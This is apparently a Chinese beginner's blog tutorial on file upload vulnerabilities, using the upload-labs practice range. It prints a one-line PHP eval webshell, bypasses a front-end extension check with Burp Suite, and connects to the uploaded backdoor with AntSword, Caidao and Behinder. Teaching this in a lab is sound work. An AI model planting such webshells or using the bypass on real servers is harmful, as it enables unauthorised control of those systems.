网络安全菜鸟学习之漏洞篇——文件上传漏洞

这篇文章我们来新学一个漏洞——文件上传漏洞。
老规矩,我们先来学习一下它的原理。网络安全菜鸟学习之漏洞篇——文件上传漏洞_第1张图片
如同图上面画的一样,我们所谓的文件上传漏洞就是把带有后门的文件上传至服务器。
好,我们现在来做一个实验来进一步理解一下。
(注:我们使用的靶场是upload-labs-master。下载链接:https://github.com/c0ny1/upload-labs)
首先,我们在桌面新建一个文档在里面输入以下代码:

 @eval($_POST[value]);?>

网络安全菜鸟学习之漏洞篇——文件上传漏洞_第2张图片
我们保存好它以后把它重命名为:xxx.php(xxx为任意的内容,但最好不要用中文),这样简单的一句话木马就做好了。
好,现在我们打开靶场来试一试突破第一关。
网络安全菜鸟学习之漏洞篇——文件上传漏洞_第3张图片
首先我们直接点击上传,我们会发现上传失败。(如图)网络安全菜鸟学习之漏洞篇——文件上传漏洞_第4张图片
这是怎么回事呢?我们点击显示源码来分析一下。
网络安全菜鸟学习之漏洞篇——文件上传漏洞_第5张图片
网络安全菜鸟学习之漏洞篇——文件上传漏洞_第6张图片
很明显它只允许.jpg.png.gif格式的文件上传,那么我们就需上传时用这几种格式的文件中的一种。但是我们的一句话木马不能在.jpg.png.gif格式下执行,这可怎么办?(当然有文件包含漏洞就另当别论,我们后面会讲)
这里我不卖关子了,我们点击右键,选择审查元素。这时我们可以发现它是把这些代码写在了前端。网络安全菜鸟学习之漏洞篇——文件上传漏洞_第7张图片
那么就很简单了,我们可以先以.jpg.png.gif格式绕过前端验证,然后再改回来。具体步骤如下:
一、把123.php改成123.jpg

网络安全菜鸟学习之漏洞篇——文件上传漏洞_第8张图片

二、打开burpsuite准备抓包

网络安全菜鸟学习之漏洞篇——文件上传漏洞_第9张图片

三、点击上传,然后在burpsuite上把格式改成.php
网络安全菜鸟学习之漏洞篇——文件上传漏洞_第10张图片
网络安全菜鸟学习之漏洞篇——文件上传漏洞_第11张图片
网络安全菜鸟学习之漏洞篇——文件上传漏洞_第12张图片
网络安全菜鸟学习之漏洞篇——文件上传漏洞_第13张图片
好了,至此我们的一句话木马就成功上传了。估计大家还是有点懵为啥抓包就绕过了。因此我给大家画了一个图,方便大家理解。网络安全菜鸟学习之漏洞篇——文件上传漏洞_第14张图片
好了估计大家都对此有了一定的理解了,现在我们来尝试连接后门。
我们右键点击复制图片地址,然后打开蚁剑右键添加数据。(密码是value,填好后添加即可)网络安全菜鸟学习之漏洞篇——文件上传漏洞_第15张图片
再双击就可以连接到后门了。网络安全菜鸟学习之漏洞篇——文件上传漏洞_第16张图片

之前有粉丝私信我,问我怎么使用菜刀。这会儿我把常见的几种后门连接软件都演示一遍。
我们常用的是菜刀、蚁剑、冰蝎,其中蚁剑我们刚才才演示了。现在我们先演示菜刀,然后再演示冰蝎。
打开菜刀,右键添加。然后其它地方和蚁剑一样,只是下面要像下图一样填写。网络安全菜鸟学习之漏洞篇——文件上传漏洞_第17张图片

网络安全菜鸟学习之漏洞篇——文件上传漏洞_第18张图片
网络安全菜鸟学习之漏洞篇——文件上传漏洞_第19张图片
冰蝎和它们差不多,唯一的不同就是它连接的后门是它指定的在冰蝎的软件包里有。网络安全菜鸟学习之漏洞篇——文件上传漏洞_第20张图片
网络安全菜鸟学习之漏洞篇——文件上传漏洞_第21张图片

我们现在上传一个文件名为100.php的该木马后门。(具体过程和前面讲的一样我就不重复了,就直接讲连接)
打开冰蝎,右键添加。然后其它地方和蚁剑一样。

网络安全菜鸟学习之漏洞篇——文件上传漏洞_第22张图片

网络安全菜鸟学习之漏洞篇——文件上传漏洞_第23张图片
网络安全菜鸟学习之漏洞篇——文件上传漏洞_第24张图片
注:冰蝎对php版本有限制,我测试结果为7.1以下没法用。
(ps:求各位看官给点评论和关注)

你可能感兴趣的:(网络安全,安全,网络)